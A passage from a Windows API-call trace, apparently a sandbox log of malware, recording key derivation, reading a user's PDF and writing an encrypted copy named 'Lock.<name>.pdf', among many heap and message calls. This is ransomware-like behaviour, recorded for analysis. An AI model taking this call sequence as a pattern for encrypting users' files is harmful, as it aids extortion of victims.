lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.238] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87710, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87050) returned 1 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.240] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0267.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.240] CryptDestroyHash (hHash=0xa87710) returned 1 [0267.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0267.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0267.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/R8WIHAk.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\r8wihak.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0267.241] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0267.241] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0267.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0267.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0267.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0267.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.243] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0267.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0267.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0267.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0267.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.R8WIHAk.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\lock.r8wihak.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0267.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0267.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0267.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125e020 [0267.248] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0267.248] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x850b, lpOverlapped=0x0) returned 1 [0267.250] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0267.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f16018 [0267.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125e020 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0267.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0267.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f1e530 [0267.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f16018 [0267.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0267.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0267.260] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0267.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f16018 [0267.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0267.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0267.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f26a48 [0267.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0267.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0267.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.263] RtlAllocateHeap 